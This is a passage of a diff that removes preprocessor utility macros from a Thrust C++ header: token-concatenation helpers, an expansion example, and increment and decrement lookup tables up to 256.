THRUST_PP_CAT2_IMPL0(a, b) - -#if defined(_MSC_VER) \ - && (defined(__EDG__) || defined(__EDG_VERSION__)) \ - && (defined(__INTELLISENSE__) || __EDG_VERSION__ >= 308) - #define THRUST_PP_CAT2_IMPL0(a, b) THRUST_PP_CAT2_IMPL1(~, a ## b) - #define THRUST_PP_CAT2_IMPL1(p, res) res -#else - #define THRUST_PP_CAT2_IMPL0(a, b) a ## b -#endif - -#define THRUST_PP_CAT3(a, b, c) \ - THRUST_PP_CAT2(a, \ - THRUST_PP_CAT2(b, c)) \ - /**/ - -#define THRUST_PP_CAT4(a, b, c, d) \ - THRUST_PP_CAT2(a, \ - THRUST_PP_CAT2(b, \ - THRUST_PP_CAT2(c, d))) \ - /**/ - -#define THRUST_PP_CAT5(a, b, c, d, e) \ - THRUST_PP_CAT2(a, \ - THRUST_PP_CAT2(b, \ - THRUST_PP_CAT2(c, \ - THRUST_PP_CAT2(d, e)))) \ - /**/ - -/////////////////////////////////////////////////////////////////////////////// - -/// \def THRUST_PP_EXPAND(x) -/// \brief Performs macro expansion on \a x. -/// -/// \par Example: -/// -/// \code -/// #include -/// #include -/// -/// #define FOO_BAR() "foo_bar" -/// #define BUZZ() THRUST_PP_EXPAND(THRUST_PP_CAT2(FOO_, BAR)()) -/// -/// int main() -/// { -/// std::cout << BUZZ() << "\n"; -/// } -/// \endcode -/// -/// The above code expands to: -/// -/// \code -/// #include -/// #include -/// -/// int main() -/// { -/// std::cout << "foo_bar" << "\n"; -/// } -/// \endcode -/// -#define THRUST_PP_EXPAND(x) THRUST_PP_EXPAND_IMPL0(x) -#define THRUST_PP_EXPAND_IMPL0(x) x - -#define THRUST_PP_EXPAND_ARGS(...) THRUST_PP_EXPAND_ARGS_IMPL0(__VA_ARGS__) -#define THRUST_PP_EXPAND_ARGS_IMPL0(...) __VA_ARGS__ - -#define THRUST_PP_HEAD(x, ...) x - -#define THRUST_PP_TAIL(x, ...) __VA_ARGS__ - -/////////////////////////////////////////////////////////////////////////////// - -#define THRUST_PP_EMPTY() - -#define THRUST_PP_COMMA() , - -/////////////////////////////////////////////////////////////////////////////// - -#define THRUST_PP_INC(x) THRUST_PP_INC_IMPL0(x) - -#define THRUST_PP_INC_IMPL0(x) THRUST_PP_CAT2(THRUST_PP_INC_IMPL_TAG, x) - -#define THRUST_PP_INC_IMPL_TAG0 1 -#define THRUST_PP_INC_IMPL_TAG1 2 -#define THRUST_PP_INC_IMPL_TAG2 3 -#define THRUST_PP_INC_IMPL_TAG3 4 -#define THRUST_PP_INC_IMPL_TAG4 5 -#define THRUST_PP_INC_IMPL_TAG5 6 -#define THRUST_PP_INC_IMPL_TAG6 7 -#define THRUST_PP_INC_IMPL_TAG7 8 -#define THRUST_PP_INC_IMPL_TAG8 9 -#define THRUST_PP_INC_IMPL_TAG9 10 -#define THRUST_PP_INC_IMPL_TAG10 11 -#define THRUST_PP_INC_IMPL_TAG11 12 -#define THRUST_PP_INC_IMPL_TAG12 13 -#define THRUST_PP_INC_IMPL_TAG13 14 -#define THRUST_PP_INC_IMPL_TAG14 15 -#define THRUST_PP_INC_IMPL_TAG15 16 -#define THRUST_PP_INC_IMPL_TAG16 17 -#define THRUST_PP_INC_IMPL_TAG17 18 -#define THRUST_PP_INC_IMPL_TAG18 19 -#define THRUST_PP_INC_IMPL_TAG19 20 -#define THRUST_PP_INC_IMPL_TAG20 21 -#define THRUST_PP_INC_IMPL_TAG21 22 -#define THRUST_PP_INC_IMPL_TAG22 23 -#define THRUST_PP_INC_IMPL_TAG23 24 -#define THRUST_PP_INC_IMPL_TAG24 25 -#define THRUST_PP_INC_IMPL_TAG25 26 -#define THRUST_PP_INC_IMPL_TAG26 27 -#define THRUST_PP_INC_IMPL_TAG27 28 -#define THRUST_PP_INC_IMPL_TAG28 29 -#define THRUST_PP_INC_IMPL_TAG29 30 -#define THRUST_PP_INC_IMPL_TAG30 31 -#define THRUST_PP_INC_IMPL_TAG31 32 -#define THRUST_PP_INC_IMPL_TAG32 33 -#define THRUST_PP_INC_IMPL_TAG33 34 -#define THRUST_PP_INC_IMPL_TAG34 35 -#define THRUST_PP_INC_IMPL_TAG35 36 -#define THRUST_PP_INC_IMPL_TAG36 37 -#define THRUST_PP_INC_IMPL_TAG37 38 -#define THRUST_PP_INC_IMPL_TAG38 39 -#define THRUST_PP_INC_IMPL_TAG39 40 -#define THRUST_PP_INC_IMPL_TAG40 41 -#define THRUST_PP_INC_IMPL_TAG41 42 -#define THRUST_PP_INC_IMPL_TAG42 43 -#define THRUST_PP_INC_IMPL_TAG43 44 -#define THRUST_PP_INC_IMPL_TAG44 45 -#define THRUST_PP_INC_IMPL_TAG45 46 -#define THRUST_PP_INC_IMPL_TAG46 47 -#define THRUST_PP_INC_IMPL_TAG47 48 -#define THRUST_PP_INC_IMPL_TAG48 49 -#define THRUST_PP_INC_IMPL_TAG49 50 -#define THRUST_PP_INC_IMPL_TAG50 51 -#define THRUST_PP_INC_IMPL_TAG51 52 -#define THRUST_PP_INC_IMPL_TAG52 53 -#define THRUST_PP_INC_IMPL_TAG53 54 -#define THRUST_PP_INC_IMPL_TAG54 55 -#define THRUST_PP_INC_IMPL_TAG55 56 -#define THRUST_PP_INC_IMPL_TAG56 57 -#define THRUST_PP_INC_IMPL_TAG57 58 -#define THRUST_PP_INC_IMPL_TAG58 59 -#define THRUST_PP_INC_IMPL_TAG59 60 -#define THRUST_PP_INC_IMPL_TAG60 61 -#define THRUST_PP_INC_IMPL_TAG61 62 -#define THRUST_PP_INC_IMPL_TAG62 63 -#define THRUST_PP_INC_IMPL_TAG63 64 -#define THRUST_PP_INC_IMPL_TAG64 65 -#define THRUST_PP_INC_IMPL_TAG65 66 -#define THRUST_PP_INC_IMPL_TAG66 67 -#define THRUST_PP_INC_IMPL_TAG67 68 -#define THRUST_PP_INC_IMPL_TAG68 69 -#define THRUST_PP_INC_IMPL_TAG69 70 -#define THRUST_PP_INC_IMPL_TAG70 71 -#define THRUST_PP_INC_IMPL_TAG71 72 -#define THRUST_PP_INC_IMPL_TAG72 73 -#define THRUST_PP_INC_IMPL_TAG73 74 -#define THRUST_PP_INC_IMPL_TAG74 75 -#define THRUST_PP_INC_IMPL_TAG75 76 -#define THRUST_PP_INC_IMPL_TAG76 77 -#define THRUST_PP_INC_IMPL_TAG77 78 -#define THRUST_PP_INC_IMPL_TAG78 79 -#define THRUST_PP_INC_IMPL_TAG79 80 -#define THRUST_PP_INC_IMPL_TAG80 81 -#define THRUST_PP_INC_IMPL_TAG81 82 -#define THRUST_PP_INC_IMPL_TAG82 83 -#define THRUST_PP_INC_IMPL_TAG83 84 -#define THRUST_PP_INC_IMPL_TAG84 85 -#define THRUST_PP_INC_IMPL_TAG85 86 -#define THRUST_PP_INC_IMPL_TAG86 87 -#define THRUST_PP_INC_IMPL_TAG87 88 -#define THRUST_PP_INC_IMPL_TAG88 89 -#define THRUST_PP_INC_IMPL_TAG89 90 -#define THRUST_PP_INC_IMPL_TAG90 91 -#define THRUST_PP_INC_IMPL_TAG91 92 -#define THRUST_PP_INC_IMPL_TAG92 93 -#define THRUST_PP_INC_IMPL_TAG93 94 -#define THRUST_PP_INC_IMPL_TAG94 95 -#define THRUST_PP_INC_IMPL_TAG95 96 -#define THRUST_PP_INC_IMPL_TAG96 97 -#define THRUST_PP_INC_IMPL_TAG97 98 -#define THRUST_PP_INC_IMPL_TAG98 99 -#define THRUST_PP_INC_IMPL_TAG99 100 -#define THRUST_PP_INC_IMPL_TAG100 101 -#define THRUST_PP_INC_IMPL_TAG101 102 -#define THRUST_PP_INC_IMPL_TAG102 103 -#define THRUST_PP_INC_IMPL_TAG103 104 -#define THRUST_PP_INC_IMPL_TAG104 105 -#define THRUST_PP_INC_IMPL_TAG105 106 -#define THRUST_PP_INC_IMPL_TAG106 107 -#define THRUST_PP_INC_IMPL_TAG107 108 -#define THRUST_PP_INC_IMPL_TAG108 109 -#define THRUST_PP_INC_IMPL_TAG109 110 -#define THRUST_PP_INC_IMPL_TAG110 111 -#define THRUST_PP_INC_IMPL_TAG111 112 -#define THRUST_PP_INC_IMPL_TAG112 113 -#define THRUST_PP_INC_IMPL_TAG113 114 -#define THRUST_PP_INC_IMPL_TAG114 115 -#define THRUST_PP_INC_IMPL_TAG115 116 -#define THRUST_PP_INC_IMPL_TAG116 117 -#define THRUST_PP_INC_IMPL_TAG117 118 -#define THRUST_PP_INC_IMPL_TAG118 119 -#define THRUST_PP_INC_IMPL_TAG119 120 -#define THRUST_PP_INC_IMPL_TAG120 121 -#define THRUST_PP_INC_IMPL_TAG121 122 -#define THRUST_PP_INC_IMPL_TAG122 123 -#define THRUST_PP_INC_IMPL_TAG123 124 -#define THRUST_PP_INC_IMPL_TAG124 125 -#define THRUST_PP_INC_IMPL_TAG125 126 -#define THRUST_PP_INC_IMPL_TAG126 127 -#define THRUST_PP_INC_IMPL_TAG127 128 -#define THRUST_PP_INC_IMPL_TAG128 129 -#define THRUST_PP_INC_IMPL_TAG129 130 -#define THRUST_PP_INC_IMPL_TAG130 131 -#define THRUST_PP_INC_IMPL_TAG131 132 -#define THRUST_PP_INC_IMPL_TAG132 133 -#define THRUST_PP_INC_IMPL_TAG133 134 -#define THRUST_PP_INC_IMPL_TAG134 135 -#define THRUST_PP_INC_IMPL_TAG135 136 -#define THRUST_PP_INC_IMPL_TAG136 137 -#define THRUST_PP_INC_IMPL_TAG137 138 -#define THRUST_PP_INC_IMPL_TAG138 139 -#define THRUST_PP_INC_IMPL_TAG139 140 -#define THRUST_PP_INC_IMPL_TAG140 141 -#define THRUST_PP_INC_IMPL_TAG141 142 -#define THRUST_PP_INC_IMPL_TAG142 143 -#define THRUST_PP_INC_IMPL_TAG143 144 -#define THRUST_PP_INC_IMPL_TAG144 145 -#define THRUST_PP_INC_IMPL_TAG145 146 -#define THRUST_PP_INC_IMPL_TAG146 147 -#define THRUST_PP_INC_IMPL_TAG147 148 -#define THRUST_PP_INC_IMPL_TAG148 149 -#define THRUST_PP_INC_IMPL_TAG149 150 -#define THRUST_PP_INC_IMPL_TAG150 151 -#define THRUST_PP_INC_IMPL_TAG151 152 -#define THRUST_PP_INC_IMPL_TAG152 153 -#define THRUST_PP_INC_IMPL_TAG153 154 -#define THRUST_PP_INC_IMPL_TAG154 155 -#define THRUST_PP_INC_IMPL_TAG155 156 -#define THRUST_PP_INC_IMPL_TAG156 157 -#define THRUST_PP_INC_IMPL_TAG157 158 -#define THRUST_PP_INC_IMPL_TAG158 159 -#define THRUST_PP_INC_IMPL_TAG159 160 -#define THRUST_PP_INC_IMPL_TAG160 161 -#define THRUST_PP_INC_IMPL_TAG161 162 -#define THRUST_PP_INC_IMPL_TAG162 163 -#define THRUST_PP_INC_IMPL_TAG163 164 -#define THRUST_PP_INC_IMPL_TAG164 165 -#define THRUST_PP_INC_IMPL_TAG165 166 -#define THRUST_PP_INC_IMPL_TAG166 167 -#define THRUST_PP_INC_IMPL_TAG167 168 -#define THRUST_PP_INC_IMPL_TAG168 169 -#define THRUST_PP_INC_IMPL_TAG169 170 -#define THRUST_PP_INC_IMPL_TAG170 171 -#define THRUST_PP_INC_IMPL_TAG171 172 -#define THRUST_PP_INC_IMPL_TAG172 173 -#define THRUST_PP_INC_IMPL_TAG173 174 -#define THRUST_PP_INC_IMPL_TAG174 175 -#define THRUST_PP_INC_IMPL_TAG175 176 -#define THRUST_PP_INC_IMPL_TAG176 177 -#define THRUST_PP_INC_IMPL_TAG177 178 -#define THRUST_PP_INC_IMPL_TAG178 179 -#define THRUST_PP_INC_IMPL_TAG179 180 -#define THRUST_PP_INC_IMPL_TAG180 181 -#define THRUST_PP_INC_IMPL_TAG181 182 -#define THRUST_PP_INC_IMPL_TAG182 183 -#define THRUST_PP_INC_IMPL_TAG183 184 -#define THRUST_PP_INC_IMPL_TAG184 185 -#define THRUST_PP_INC_IMPL_TAG185 186 -#define THRUST_PP_INC_IMPL_TAG186 187 -#define THRUST_PP_INC_IMPL_TAG187 188 -#define THRUST_PP_INC_IMPL_TAG188 189 -#define THRUST_PP_INC_IMPL_TAG189 190 -#define THRUST_PP_INC_IMPL_TAG190 191 -#define THRUST_PP_INC_IMPL_TAG191 192 -#define THRUST_PP_INC_IMPL_TAG192 193 -#define THRUST_PP_INC_IMPL_TAG193 194 -#define THRUST_PP_INC_IMPL_TAG194 195 -#define THRUST_PP_INC_IMPL_TAG195 196 -#define THRUST_PP_INC_IMPL_TAG196 197 -#define THRUST_PP_INC_IMPL_TAG197 198 -#define THRUST_PP_INC_IMPL_TAG198 199 -#define THRUST_PP_INC_IMPL_TAG199 200 -#define THRUST_PP_INC_IMPL_TAG200 201 -#define THRUST_PP_INC_IMPL_TAG201 202 -#define THRUST_PP_INC_IMPL_TAG202 203 -#define THRUST_PP_INC_IMPL_TAG203 204 -#define THRUST_PP_INC_IMPL_TAG204 205 -#define THRUST_PP_INC_IMPL_TAG205 206 -#define THRUST_PP_INC_IMPL_TAG206 207 -#define THRUST_PP_INC_IMPL_TAG207 208 -#define THRUST_PP_INC_IMPL_TAG208 209 -#define THRUST_PP_INC_IMPL_TAG209 210 -#define THRUST_PP_INC_IMPL_TAG210 211 -#define THRUST_PP_INC_IMPL_TAG211 212 -#define THRUST_PP_INC_IMPL_TAG212 213 -#define THRUST_PP_INC_IMPL_TAG213 214 -#define THRUST_PP_INC_IMPL_TAG214 215 -#define THRUST_PP_INC_IMPL_TAG215 216 -#define THRUST_PP_INC_IMPL_TAG216 217 -#define THRUST_PP_INC_IMPL_TAG217 218 -#define THRUST_PP_INC_IMPL_TAG218 219 -#define THRUST_PP_INC_IMPL_TAG219 220 -#define THRUST_PP_INC_IMPL_TAG220 221 -#define THRUST_PP_INC_IMPL_TAG221 222 -#define THRUST_PP_INC_IMPL_TAG222 223 -#define THRUST_PP_INC_IMPL_TAG223 224 -#define THRUST_PP_INC_IMPL_TAG224 225 -#define THRUST_PP_INC_IMPL_TAG225 226 -#define THRUST_PP_INC_IMPL_TAG226 227 -#define THRUST_PP_INC_IMPL_TAG227 228 -#define THRUST_PP_INC_IMPL_TAG228 229 -#define THRUST_PP_INC_IMPL_TAG229 230 -#define THRUST_PP_INC_IMPL_TAG230 231 -#define THRUST_PP_INC_IMPL_TAG231 232 -#define THRUST_PP_INC_IMPL_TAG232 233 -#define THRUST_PP_INC_IMPL_TAG233 234 -#define THRUST_PP_INC_IMPL_TAG234 235 -#define THRUST_PP_INC_IMPL_TAG235 236 -#define THRUST_PP_INC_IMPL_TAG236 237 -#define THRUST_PP_INC_IMPL_TAG237 238 -#define THRUST_PP_INC_IMPL_TAG238 239 -#define THRUST_PP_INC_IMPL_TAG239 240 -#define THRUST_PP_INC_IMPL_TAG240 241 -#define THRUST_PP_INC_IMPL_TAG241 242 -#define THRUST_PP_INC_IMPL_TAG242 243 -#define THRUST_PP_INC_IMPL_TAG243 244 -#define THRUST_PP_INC_IMPL_TAG244 245 -#define THRUST_PP_INC_IMPL_TAG245 246 -#define THRUST_PP_INC_IMPL_TAG246 247 -#define THRUST_PP_INC_IMPL_TAG247 248 -#define THRUST_PP_INC_IMPL_TAG248 249 -#define THRUST_PP_INC_IMPL_TAG249 250 -#define THRUST_PP_INC_IMPL_TAG250 251 -#define THRUST_PP_INC_IMPL_TAG251 252 -#define THRUST_PP_INC_IMPL_TAG252 253 -#define THRUST_PP_INC_IMPL_TAG253 254 -#define THRUST_PP_INC_IMPL_TAG254 255 -#define THRUST_PP_INC_IMPL_TAG255 256 -#define THRUST_PP_INC_IMPL_TAG256 256 - -#define THRUST_PP_DEC(x) THRUST_PP_DEC_IMPL0(x) - -#define THRUST_PP_DEC_IMPL0(x) THRUST_PP_CAT2(THRUST_PP_DEC_IMPL_TAG, x) - -#define THRUST_PP_DEC_IMPL_TAG0 0 -#define THRUST_PP_DEC_IMPL_TAG1 0 -#define THRUST_PP_DEC_IMPL_TAG2 1 -#define THRUST_PP_DEC_IMPL_TAG3 2 -#define THRUST_PP_DEC_IMPL_TAG4 3 -#define THRUST_PP_DEC_IMPL_TAG5 4 -#define THRUST_PP_DEC_IMPL_TAG6 5 -#define THRUST_PP_DEC_IMPL_TAG7 6 -#define THRUST_PP_DEC_IMPL_TAG8 7 -#define THRUST_PP_DEC_IMPL_TAG9 8 -#define THRUST_PP_DEC_IMPL_TAG10 9 -#define THRUST_PP_DEC_IMPL_TAG11 10 -#define THRUST_PP_DEC_IMPL_TAG12 11 -#define THRUST_PP_DEC_IMPL_TAG13 12 -#define THRUST_PP_DEC_IMPL_TAG14 13 -#define THRUST_PP_DEC_IMPL_TAG15 14 -#define THRUST_PP_DEC_IMPL_TAG16 15 -#define THRUST_PP_DEC_IMPL_TAG17 16 -#define THRUST_PP_DEC_IMPL_TAG18 17 -#define THRUST_PP_DEC_IMPL_TAG19 18 -#define THRUST_PP_DEC_IMPL_TAG20 19 -#define THRUST_PP_DEC_IMPL_TAG21 20 -#define THRUST_PP_DEC_IMPL_TAG22 21 -#define THRUST_PP_DEC_IMPL_TAG23 22 -#define THRUST_PP_DEC_IMPL_TAG24 23 -#define THRUST_PP_DEC_IMPL_TAG25 24 -#define THRUST_PP_DEC_IMPL_TAG26 25 -#define THRUST_PP_DEC_IMPL_TAG27 26 -#define THRUST_PP_DEC_IMPL_TAG28 27 -#define THRUST_PP_DEC_IMPL_TAG29 28 -#define THRUST_PP_DEC_IMPL_TAG30 29 -#define THRUST_PP_DEC_IMPL_TAG31 30 -#define THRUST_PP_DEC_IMPL_TAG32 31 -#define THRUST_PP_DEC_IMPL_TAG33 32 -#define THRUST_PP_DEC_IMPL_TAG34 33 -#define THRUST_PP_DEC_IMPL_TAG35 34 -#define THRUST_PP_DEC_IMPL_TAG36 35 -#define THRUST_PP_DEC_IMPL_TAG37 36 -#define THRUST_PP_DEC_IMPL_TAG38 37 -#define THRUST_PP_DEC_IMPL_TAG39 38 -#define THRUST_PP_DEC_IMPL_TAG40 39 -#define THRUST_PP_DEC_IMPL_TAG41 40 -#define THRUST_PP_DEC_IMPL_TAG42 41 -#define THRUST_PP_DEC_IMPL_TAG43 42 -#define THRUST_PP_DEC_IMPL_TAG44 43 -#define THRUST_PP_DEC_IMPL_TAG45 44 -#define THRUST_PP_DEC_IMPL_TAG46 45 -#define THRUST_PP_DEC_IMPL_TAG47 46 -#define THRUST_PP_DEC_IMPL_TAG48 47 -#define THRUST_PP_DEC_IMPL_TAG49 48 -#define THRUST_PP_DEC_IMPL_TAG50 49 -#define THRUST_PP_DEC_IMPL_TAG51 50 -#define THRUST_PP_DEC_IMPL_TAG52 51 -#define THRUST_PP_DEC_IMPL_TAG53 52 -#define THRUST_PP_DEC_IMPL_TAG54 53 -#define THRUST_PP_DEC_IMPL_TAG55 54 -#define THRUST_PP_DEC_IMPL_TAG56 55 -#define THRUST_PP_DEC_IMPL_TAG57 56 -#define THRUST_PP_DEC_IMPL_TAG58 57 -#define THRUST_PP_DEC_IMPL_TAG59 58 -#define THRUST_PP_DEC_IMPL_TAG60 59 -#define THRUST_PP_DEC_IMPL_TAG61 60 -#define THRUST_PP_DEC_IMPL_TAG62 61 -#define THRUST_PP_DEC_IMPL_TAG63 62 -#define THRUST_PP_DEC_IMPL_TAG64 63 -#define THRUST_PP_DEC_IMPL_TAG65 64 -#define THRUST_PP_DEC_IMPL_TAG66 65 -#define THRUST_PP_DEC_IMPL_TAG67 66 -#define THRUST_PP_DEC_IMPL_TAG68 67 -#define THRUST_PP_DEC_IMPL_TAG69 68 -#define THRUST_PP_DEC_IMPL_TAG70 69 -#define THRUST_PP_DEC_IMPL_TAG71 70 -#define THRUST_PP_DEC_IMPL_TAG72 71 -#define THRUST_PP_DEC_IMPL_TAG73 72 -#define THRUST_PP_DEC_IMPL_TAG74 73 -#define THRUST_PP_DEC_IMPL_TAG75 74 -#define THRUST_PP_DEC_IMPL_TAG76 75 -#define THRUST_PP_DEC_IMPL_TAG77 76 -#define THRUST_PP_DEC_IMPL_TAG78 77 -#define THRUST_PP_DEC_IMPL_TAG79 78 -#define THRUST_PP_DEC_IMPL_TAG80 79 -#define THRUST_PP_DEC_IMPL_TAG81 80 -#define THRUST_PP_DEC_IMPL_TAG82 81 -#define THRUST_PP_DEC_IMPL_TAG83 82 -#define THRUST_PP_DEC_IMPL_TAG84 83 -#define THRUST_PP_DEC_IMPL_TAG85 84 -#define THRUST_PP_DEC_IMPL_TAG86 85 -#define THRUST_PP_DEC_IMPL_TAG87 86 -#define THRUST_PP_DEC_IMPL_TAG88 87 -#define THRUST_PP_DEC_IMPL_TAG89 88 -#define THRUST_PP_DEC_IMPL_TAG90 89 -#define THRUST_PP_DEC_IMPL_TAG91 90 -#define THRUST_PP_DEC_IMPL_TAG92 91 -#define THRUST_PP_DEC_IMPL_TAG93 92 -#define THRUST_PP_DEC_IMPL_TAG94 93 -#define THRUST_PP_DEC_IMPL_TAG95 94 -#define THRUST_PP_DEC_IMPL_TAG96 95 -#define THRUST_PP_DEC_IMPL_TAG97 96 -#define THRUST_PP_DEC_IMPL_TAG98 97 -#define THRUST_PP_DEC_IMPL_TAG99 98 -#define THRUST_PP_DEC_IMPL_TAG100 99 -#define THRUST_PP_DEC_IMPL_TAG101 100 -#define THRUST_PP_DEC_IMPL_TAG102 101 -#define THRUST_PP_DEC_IMPL_TAG103 102 -#define THRUST_PP_DEC_IMPL_TAG104 103 -#define THRUST_PP_DEC_IMPL_TAG105 104 -#define THRUST_PP_DEC_IMPL_TAG106 105 -#define THRUST_PP_DEC_IMPL_TAG107 106 -#define THRUST_PP_DEC_IMPL_TAG108 107 -#define THRUST_PP_DEC_IMPL_TAG109 108 -#define THRUST_PP_DEC_IMPL_TAG110 109 -#define THRUST_PP_DEC_IMPL_TAG111 110 -#define THRUST_PP_DEC_IMPL_TAG112 111 -#define THRUST_PP_DEC_IMPL_TAG113 112 -#define THRUST_PP_DEC_IMPL_TAG114 113 -#define THRUST_PP_DEC_IMPL_TAG115 114 -#define THRUST_PP_DEC_IMPL_TAG116 115 -#define THRUST_PP_DEC_IMPL_TAG117 116 -#define THRUST_PP_DEC_IMPL_TAG118 117 -#define THRUST_PP_DEC_IMPL_TAG119 118 -#define THRUST_PP_DEC_IMPL_TAG120 119 -#define THRUST_PP_DEC_IMPL_TAG121 120 -#define THRUST_PP_DEC_IMPL_TAG122 121 -#define THRUST_PP_DEC_IMPL_TAG123 122 -#define THRUST_PP_DEC_IMPL_TAG124 123 -#define THRUST_PP_DEC_IMPL_TAG125 124 -#define THRUST_PP_DEC_IMPL_TAG126 125 -#define THRUST_PP_DEC_IMPL_TAG127 126 -#define THRUST_PP_DEC_IMPL_TAG128 127 -#define THRUST_PP_DEC_IMPL_TAG129 128 -#define THRUST_PP_DEC_IMPL_TAG130 129 -#define THRUST_PP_DEC_IMPL_TAG131 130 -#define THRUST_PP_DEC_IMPL_TAG132 131 -#define THRUST_PP_DEC_IMPL_TAG133 132 -#define THRUST_PP_DEC_IMPL_TAG134 133 -#define THRUST_PP_DEC_IMPL_TAG135 134 -#define THRUST_PP_DEC_IMPL_TAG136 135 -#define THRUST_PP_DEC_IMPL_TAG137 136 -#define THRUST_PP_DEC_IMPL_TAG138 137 -#define THRUST_PP_DEC_IMPL_TAG139 138 -#define THRUST_PP_DEC_IMPL_TAG140 139 -#define THRUST_PP_DEC_IMPL_TAG141 140 -#define THRUST_PP_DEC_IMPL_TAG142 141 -#define THRUST_PP_DEC_IMPL_TAG143 142 -#define THRUST_PP_DEC_IMPL_TAG144 143 -#define THRUST_PP_DEC_IMPL_TAG145 144 -#define THRUST_PP_DEC_IMPL_TAG146 145 -#define THRUST_PP_DEC_IMPL_TAG147 146 -#define THRUST_PP_DEC_IMPL_TAG148 147 -#define THRUST_PP_DEC_IMPL_TAG149 148 -#define THRUST_PP_DEC_IMPL_TAG150 149 -#define THRUST_PP_DEC_IMPL_TAG151 150 -#define THRUST_PP_DEC_IMPL_TAG152 151 -#define THRUST_PP_DEC_IMPL_TAG153 152 -#define THRUST_PP_DEC_IMPL_TAG154 153 -#define THRUST_PP_DEC_IMPL_TAG155 154 -#define THRUST_PP_DEC_IMPL_TAG156 155 -#define THRUST_PP_DEC_IMPL_TAG157 156 -#define THRUST_PP_DEC_IMPL_TAG158 157 -#define THRUST_PP_DEC_IMPL_TAG159 158 -#define THRUST_PP_DEC_IMPL_TAG160 159 -#define THRUST_PP_DEC_IMPL_TAG161 160 -#define THRUST_PP_DEC_IMPL_TAG162 161 -#define THRUST_PP_DEC_IMPL_TAG163 162 -#define THRUST_PP_DEC_IMPL_TAG164 163 -#define THRUST_PP_DEC_IMPL_TAG165 164 -#define THRUST_PP_DEC_IMPL_TAG166 165 -#define THRUST_PP_DEC_IMPL_TAG167 166 -#define THRUST_PP_DEC_IMPL_TAG168 167 -#define THRUST_PP_DEC_IMPL_TAG169 168 -#define THRUST_PP_DEC_IMPL_TAG170 169 -#define THRUST_PP_DEC_IMPL_TAG171 170 -#define THRUST_PP_DEC_IMPL_TAG172 171 -#define THRUST_PP_DEC_IMPL_TAG173 172 -#define THRUST_PP_DEC_IMPL_TAG174 173 -#define THRUST_PP_DEC_IMPL_TAG175 174 -#define THRUST_PP_DEC_IMPL_TAG176 175 -#define THRUST_PP_DEC_IMPL_TAG177 176 -#define THRUST_PP_DEC_IMPL_TAG178 177 -#define THRUST_PP_DEC_IMPL_TAG179 178 -#define THRUST_PP_DEC_IMPL_TAG180 179 -#define THRUST_PP_DEC_IMPL_TAG181 180 -#define THRUST_PP_DEC_IMPL_TAG182 181 -#define THRUST_PP_DEC_IMPL_TAG183 182 -#define THRUST_PP_DEC_IMPL_TAG184 183 -#define THRUST_PP_DEC_IMPL_TAG185 184 -#define THRUST_PP_DEC_IMPL_TAG186 185 -#define THRUST_PP_DEC_IMPL_TAG187 186 -#define THRUST_PP_DEC_IMPL_TAG188 187 -#define THRUST_PP_DEC_IMPL_TAG189 188 -#define THRUST_PP_DEC_IMPL_TAG190 189 -#define THRUST_PP_DEC_IMPL_TAG191 190 -#define THRUST_PP_DEC_IMPL_TAG192 191 -#define THRUST_PP_DEC_IMPL_TAG193 192 -#define THRUST_PP_DEC_IMPL_TAG194 193 -#define THRUST_PP_DEC_IMPL_TAG195 194 -#define THRUST_PP_DEC_IMPL_TAG196 195 -#define THRUST_PP_DEC_IMPL_TAG197 196 -#define THRUST_PP_DEC_IMPL_TAG198 197 -#define THRUST_PP_DEC_IMPL_TAG199 198 -#define THRUST_PP_DEC_IMPL_TAG200 199 -#define THRUST_PP_DEC_IMPL_TAG201 200 -#define THRUST_PP_DEC_IMPL_TAG202 201 -#define THRUST_PP_DEC_IMPL_TAG203 202 -#define THRUST_PP_DEC_IMPL_TAG204 203 -#define THRUST_PP_DEC_IMPL_TAG205 204 -#define THRUST_PP_DEC_IMPL_TAG206 205 -#define THRUST_PP_DEC_IMPL_TAG207 206 -#define THRUST_PP_DEC_IMPL_TAG208 207 -#define THRUST_PP_DEC_IMPL_TAG209 208 -#define THRUST_PP_DEC_IMPL_TAG210 209 -#define THRUST_PP_DEC_IMPL_TAG211 210 -#define THRUST_PP_DEC_IMPL_TAG212 211 -#define THRUST_PP_DEC_IMPL_TAG213 212 -#define THRUST_PP_DEC_IMPL_TAG214 213 -#define THRUST_PP_DEC_IMPL_TAG215 214 -#define THRUST_PP_DEC_IMPL_TAG216 215 -#define THRUST_PP_DEC_IMPL_TAG217 216 -#define THRUST_PP_DEC_IMPL_TAG218 217 -#define THRUST_PP_DEC_IMPL_TAG219 218 -#define THRUST_PP_DEC_IMPL_TAG220 219 -#define THRUST_PP_DEC_IMPL_TAG221 220 -#define THRUST_PP_DEC_IMPL_TAG222 221 -#define THRUST_PP_DEC_IMPL_TAG223 222 -#define THRUST_PP_DEC_IMPL_TAG224 223 -#define THRUST_PP_DEC_IMPL_TAG225 224 -#define THRUST_PP_DEC_IMPL_TAG226 225 -#define THRUST_PP_DEC_IMPL_TAG227 226 -#define THRUST_PP_DEC_IMPL_TAG228 227 -#define THRUST_PP_DEC_IMPL_TAG229 228 -#define THRUST_PP_DEC_IMPL_TAG230 229 -#define THRUST_PP_DEC_IMPL_TAG231 230 -#define THRUST_PP_DEC_IMPL_TAG232 231 -#define THRUST_PP_DEC_IMPL_TAG233 232 -#define THRUST_PP_DEC_IMPL_TAG234 233 -#define THRUST_PP_DEC_IMPL_TAG235 234 -#define THRUST_PP_DEC_IMPL_TAG236 235 -#define THRUST_PP_DEC_IMPL_TAG237 236 -#define THRUST_PP_DEC_IMPL_TAG238 237 -#define THRUST_PP_DEC_IMPL_TAG239 238 -#define THRUST_PP_DEC_IMPL_TAG240 239 -#define THRUST_PP_DEC_IMPL_TAG241 240 -#define THRUST_PP_DEC_IMPL_TAG242 241 -#define THRUST_PP_DEC_IMPL_TAG243 242 -#define THRUST_PP_DEC_IMPL_TAG244 243 -#define THRUST_PP_DEC_IMPL_TAG245 244 -#define THRUST_PP_DEC_IMPL_TAG246 245 -#define THRUST_PP_DEC_IMPL_TAG247 246 -#define THRUST_PP_DEC_IMPL_TAG248 247 -#define THRUST_PP_DEC_IMPL_TAG249 248 -#define THRUST_PP_DEC_IMPL_TAG250 249 -#define THRUST_PP_DEC_IMPL_TAG251 250 -#define THRUST_PP_DEC_IMPL_TAG252 251 -#define THRUST_PP_DEC_IMPL_TAG253 252 -#define THRUST_PP_DEC_IMPL_TAG254 253 -#define THRUST_PP_DEC_IMPL_TAG255 254 -#define THRUST_PP_DEC_IMPL_TAG256 255 -#define THRUST_PP_DEC_IMPL_TAG257 256 - -#define THRUST_PP_BOOL(x) THRUST_PP_BOOL_IMPL0(x) - -#define THRUST_PP_BOOL_IMPL0(x) 